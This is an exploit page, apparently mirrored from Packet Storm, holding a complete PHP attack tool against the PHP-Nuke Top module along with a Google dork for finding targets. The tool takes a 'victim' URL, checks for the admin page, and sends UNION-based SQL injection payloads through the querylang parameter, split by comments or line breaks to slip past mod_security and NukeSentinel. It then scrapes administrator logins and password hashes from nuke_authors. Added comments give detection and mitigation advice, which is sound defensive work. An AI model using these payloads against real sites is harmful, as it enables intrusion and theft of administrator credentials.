## https://sploitus.com/exploit?id=PACKETSTORM:182093
# Exploit Title: PHP-Nuke (SQL injection in the Top module + protection bypass)
# Google Dork: intext: Powered by PHP-Nuke  
# Date: 2024-10-07  
# Exploit Author: Emiliano Febbi  
# Vendor Homepage: https://phpnuke.org/  
# Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/  
# Version: 6.x < 7.6  
# Tested on: Windows 10  
  
[code] -> A new approach to exploit writing: the CMS protections do not stop it. -> Very quick to use.
  
<?php
/*
 * Single-page attacker-side tool for the PHP-Nuke "Top" module (version range given
 * in the header above). It renders an HTML form; on POST it issues probe requests and
 * four GET requests against the submitted base URL, each carrying a UNION-based SQL
 * injection through the `querylang` parameter of modules.php?name=Top, and scrapes the
 * `aid` (login) and `pwd` (password hash) columns of `nuke_authors` out of the HTML
 * that comes back. Nothing is validated: $_POST['victim'] is interpolated verbatim into
 * the request URLs and into this page's own HTML output.
 *
 * Detection / mitigation notes, taken from the literal request strings below:
 *  - the vector is the `querylang` query-string parameter of modules.php?name=Top, so
 *    any non-empty value of that parameter containing SQL keywords is suspicious;
 *  - method #1 mixes keyword case (`UnIOn`, `SeLecT`) and separates keywords with
 *    `%23xyz%0A`, which decodes to `#xyz` + newline (a `#` line comment);
 *  - method #2 separates keywords with `%0D%0A` (CRLF) and `+` (space).
 *  A signature that matches only a literal, single-line `UNION SELECT` will miss both.
 *  Normalise case, strip SQL comments and treat CR/LF as whitespace before matching;
 *  the table name `nuke_authors` in a query string is a strong indicator on its own.
 *  The real fix is the vendor's: the module must not accept raw SQL fragments from
 *  request parameters.
 */
/* Attacker-side UI: a form meant to post the target base URL (`victim`) and the
 * method selector (`exploit_nuke`) back to this same script. */
echo '<html><head><title>PHP-Nuke SQL injection / Bypass Protections</title></head><body><center>
<body bgcolor="black"><body link="yellow">
<font color="white">
<pre>new exploit concept
######################################################################
#This exploit is for Top Module of PHP-Nuke 6.x < 7.6 #
#auto-bypass *illegal operation* , *mod security* , *NukeSentinel* #
#allowed http and https protocols. Code by Emiliano Febbi #
######################################################################
</pre><form action="'.$SERVER[PHP_SELF].'" method="POST">
<font color="red">~ insert victim site ~ </font>(*the folder must be specified)<br>
<input type="text" name="victim" value="http://www.site.com"><br>
<label for="dlt"><font color="white">++method++</font></label>
<select name="exploit_nuke" id="lang"><option value="one">#1</option>
<option value="two">#2</option></select><br><input type="submit" value="launch!"/><br>
</form></font></body></html>';
/* Only runs after the form is submitted. The base URL is taken as-is: no scheme or
 * host validation, so whatever was typed becomes the prefix of every request below. */
if($_POST['victim']) {
$site = $_POST['victim'];
$j = $_POST['exploit_nuke'];
/* Dispatch on the selected method. The two cases differ in how the injected SQL is
 * encoded, in the padding value of the UNION columns (1 vs 0) and therefore in the
 * anchor marker used to scrape the result (pollID=1 vs pollID=0). */
switch ($j) { /*#method1*/
case "one":
/*#Get info from victim site*/
/* Reconnaissance: file() fetches the URL and returns false only on failure, so any
 * reachable page counts as "found" — these probes say nothing about vulnerability. */
if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>";
else echo "<font color='yellow'>~missing Admin Login</font><br><br>";
if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>";
else echo "<font color='yellow'>#Top Module not Active!</font><br>";
print '<font color="white">--------------------------------------<br></font>';
/*#Get user1*/
print "<font color='white'>#user1:<br><font color='lime'>";
/* Method #1 payload, URL-decoded: " WHERE 1=2 #xyz\nUnIOn#xyz\nSeLecT 1,aid,1,1 FROM nuke_authors--".
 * The `#xyz` + newline pairs are `#` line comments that split the keywords across lines. */
$content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");
/* Scrape: split the response on the Surveys anchor that (presumably) wraps each
 * rendered row, then cut the first match at its closing tag. If the marker is absent
 * (target offline, not vulnerable, or a different page layout) [1] is an undefined
 * index and the dump shows NULL / an empty string. */
$comment_user=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user);
$comment_user=explode("</a>",$comment_user[1]);
/* var_dump prints `string(N) "..."`, so the length of the value is shown as well. */
var_dump(strip_tags($comment_user[0]));
echo "</font><br>";
/*#Get pwd1*/
print "#password1:<br><font color='red'>";
/* Same payload with the `pwd` column selected instead of `aid`. */
$content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");
$comment=explode('<a href="modules.php?name=Surveys&pollID=1">',$content);
$comment=explode("</a>",$comment[1]);
var_dump(strip_tags($comment[0]));
echo "</font><br>";
/*#Get user2*/
print "#user2:<br><font color='lime'>";
/* The identical request is sent again (no caching); index [2] takes the second
 * matching anchor, i.e. the second author row. */
$content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");
$comment_user2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user2);
$comment_user2=explode("</a>",$comment_user2[2]);
var_dump(strip_tags($comment_user2[0]));
echo "</font><br>";
/*#Get pwd2*/
print "#password2:<br><font color='red'>";
$content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");
$comment2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content2);
$comment2=explode("</a>",$comment2[2]);
var_dump(strip_tags($comment2[0]));
echo "</font><br>";
break;
/*###################################################################################################################################*/
case "two": /*#method2*/
/*#Get info from victim site*/
/* Same reconnaissance probes as method #1. */
if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>";
else echo "<font color='yellow'>~missing Admin Login</font><br><br>";
if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>";
else echo "<font color='yellow'>#Top Module not Active!</font><br>";
print '<font color="white">--------------------------------------<br></font>';
/*#Get user1*/
print "<font color='white'>#user1:<br><font color='lime'>";
/* Method #2 payload, URL-decoded: " UnIOn\r\nSeleCt\r\n 0,aid,0,0 from nuke_authors--".
 * Keywords are separated by CRLF instead of comments, there is no WHERE clause, and
 * the padding columns are 0, which is why the scrape marker below is pollID=0. */
$content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");
/* Scrape as in method #1; [1] is undefined if the marker never appears. */
$comment_userj=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userj);
$comment_userj=explode("</a>",$comment_userj[1]);
var_dump(strip_tags($comment_userj[0]));
echo "</font><br>";
/*#Get pwd1*/
print "#password1:<br><font color='red'>";
/* Same payload, `pwd` column. */
$content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");
$comment_userp=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userp);
$comment_userp=explode("</a>",$comment_userp[1]);
var_dump(strip_tags($comment_userp[0]));
echo "</font><br>";
/*#Get user2*/
print "#user2:<br><font color='lime'>";
/* Request repeated; index [2] selects the second matching anchor (second row). */
$content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");
$comment_userz=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userz);
$comment_userz=explode("</a>",$comment_userz[2]);
var_dump(strip_tags($comment_userz[0]));
echo "</font><br>";
/*#Get pwd2*/
print "#password2:<br><font color='red'>";
$content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");
$comment_userq=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userq);
$comment_userq=explode("</a>",$comment_userq[2]);
var_dump(strip_tags($comment_userq[0]));
echo "</font><br>";
break;
/* The extra `;` after the closing braces are empty statements — harmless, no effect. */
};;
};;;
?>
[/code]